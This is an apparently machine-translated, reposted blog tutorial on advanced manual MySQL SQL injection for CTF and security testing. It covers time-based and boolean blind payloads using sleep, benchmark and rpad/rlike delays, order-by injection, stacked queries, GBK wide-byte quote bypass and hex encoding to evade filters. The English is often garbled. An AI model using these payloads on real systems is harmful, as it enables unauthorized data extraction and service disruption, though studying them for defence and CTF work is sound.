Hand SQL injection Advanced articles

Others 2019-09-23 14:50:18 views: null

0. Introduction

  Previous we introduced SQL injection manual processes and steps, but in the actual security issues as well as CTF title, query varied, but will certainly be a security user input filter, and these filters are not It must be 100% safe, how to use a few tricks to bypass some security filter, which is what we want to introduce this one.

  If you are not familiar with SQL injection processes and steps, please read my blog post.

  There are omissions and errors in the text, but also please the master said.

 

1. A variety of select statement to bypass

 (1)select xxx from xxx limit $num;

  Part injection method where we explained the conditions of the query, then if it is not where but other statements, such as limit restrictions, which may appear to limit how many lines per page display used in, for example, the following statement

  select * from student limit $num;

  $ Num variable we are uploaded, if we were still using the order number check column will return the following results

 

   Mysql will prompt syntax error, because sorting is required at the front page, then how do we check this time the number of columns, the answer is the last mention of use into @, @, @, @ is the '@' character, it represents Mysql in a temporary variable.

  E.g  

 

  Must ensure that the number of variables is equal to the number of columns, use of this feature we can find out the number of columns.

  (2) updata, insert, delete relevant

  And select similar, or to find the location parameters, and then determine the type of injection, the final expression construct SQL injection.

  (3) order by injection

  As already we talked about using the order number check column by, in fact, order by expression can be performed by a bit operation

select * from student order by 1|(sleep(5));

 

2. Time function blinds

  Sometimes when a page is not wrong echo, consider using a function of time the blinds. Principle is to use condition judgment sleep, we need only observe the response time can be.

  E.g

select * from student where id=1 and if(user()='root@localhost',sleep(5),null);#判断用户

select * from student where id=1 and if(substr(user(),1,1)='r',sleep(5),null);#逐字判断

  We can start with a conditional never really sleep () is available, when the sleep () is disabled, we can replace the delay by several other methods below.

 (1) Method delay

  • sleep () function.
  • benchmark (count, expr), repeat function expr count times, we can use some of the built-in encryption function as MySql expr executed multiple times to achieve sleep better. Specific changes in the number of executions can be carried out according to the CPU.
select * from student where id=1 and if(true,benchmark(10000000,sha(1)),null);
  • Cartesian product, using the calculated Cartesian product reaches delay;
select count(*) from information_schema.columns A,information_schema.columns B;#count(*)返回行数
  • get_lock (str, timeout), the need to open two sessions, the first time to lock str, will then perform a second timeout waiting time, if the timeout is negative, then wait indefinitely. get_lock () will explicitly release the lock, the transaction is committed or rolled back when the session is suspended or implicit execution release_lock () does not release the lock.
  • length (STR), the use of long strings rpad structure, and then return to a length.
select LENGTH(concat(rpad(1,9999999,'a'),rpad(1,9999999,'a'),rpad(1,9999999,'a'),rpad(1,9999999,'a'),rpad(1,9999999,'a'),rpad(1,9999999,'a'),rpad(1,9999999,'a')));

 

  • rlike, regexp, using the first repeat of formula rpad or long strings configured reuse RLIKE regular returns a match, the string length by a control structure of control time.
select concat(rpad(1,9999999,'a'),rpad(1,9999999,'a'),rpad(1,9999999,'a'),rpad(1,9999999,'a'),rpad(1,9999999,'a'),rpad(1,9999999,'a'),rpad(1,9999999,'a')) rlike '(a.*)+(a.*)+(a.*)+(a.*)+(a.*)';

  ps construction can not exceed the length of the string MySql memory limit, otherwise it will error.

 (2) Analyzing condition

  • if(expr,expr1,expr2).
  • case when xx then xx; When syntax to a method of using the case of the determination condition.

 (3) string interception

  • substr (str, pos, len), with the Python substr () function, but in the first position MySql 1 or -len.
  • mid (str, pos, len), substantially supra
  • substring_index (str, delim, count), return all the contents of the first to count the left of the string delim
select substring_index('a.b.c.d','.',3);#返回a.b.c
  • left (str, len), returns to the left str len characters.
  • right (str, len), the right of return str len characters.

  Essentially time is a kind of blind bool blinds, the use of echo messages of different, but here the echo is not explicitly displayed on the screen only.

 

3.bool blinds

  Using different echo information database to guess, such a kind of order by bool blind, generally using binary or bit-wise manner for dismantling blinds. Some mechanisms may utilize a short-circuit is connected to bit arithmetic expression.

 

4. The multi-line injection

  When you call the function supports multi-line database sql statement can be used, the principle is the use of ';' end of the statement insert your own sql statement.

 

5.MySql coding injection

(1) converting the weak type

  First look at such a query select * from student where name = 1;

  

 

  Why it can be queried, because the name will be converted to digital and 1 comparison, and the default conversion php MySql and similar conversion, find the first character is not numeric ended. Using this feature we can make some inquiries to determine.

(2) injection-byte wide

  When using the current database GBK encoded, the characters will be converted to two characters (a character is larger than the former 128), use this feature together with the rear end of the filter to achieve injection.

  For example, when the back-end filter 'turning it into \' time, if the type gbk coding, the pass is% 5C% 27, this time we submit% df 'will be encoded as% df% 5C% 27, and % df% 5c foregoing it will be encoded into Chinese, to effect the injection.

(3) SQL character set of features

  For utf8_unicode_ci characters, case insensitive, and Ä = A, Ö = O, Ü = U and other conditions are fulfilled, and ß = ss,

  For utf8_general_ci character set, ß = s.

  Self-testing may be more conditional equation.

(4) hex conversion

  If the table name and column names the filter can be converted character hexadecimal achieve the foregoing belt 0x

6. Summary

  This post is on the basis of an explanation on some other injection method has been introduced many MySql function. To the knowledge of Mysql has now finished, and the next we will focus on explaining how to get around some of the back end of the bypass filter transmission parameters.

  If there is anything to add a place, please master in the comments area.

 

Guess you like

Origin www.cnblogs.com/xenny/p/11568139.html
Recommended
Ranking
ElasticSearch-- data modeling best practices
Permission Maintenance - Shadow User Backdoor
Refactor the code using MVP mode
Quantitative investment-fundamental model-PVC multi-factor model
Spark Big Data Processing Lecture Notes 3.2 Mastering RDD Operators
Blazor page components (2)
Erlernen von Kenntnissen zur Android-Entwicklung – Kodierung, Verschlüsselung, Hash, Serialisierung und Zeichensätze
About Qi high in JAVA study notes SORM summary detailed personal explanation
Will you calculate the accuracy of the rope displacement sensor in the measurement?
OPENJTAG debugging learning (3): debugging using the gdb command line
Daily
More
2024-05-01(4)
2024-04-30(36)
2024-04-29(5)
2024-04-28(12)
2024-04-27(29)
2024-04-26(22)
2024-04-25(32)
2024-04-24(30)
2024-04-23(30)
2024-04-22(5)

Code World

© 2018 codetd.com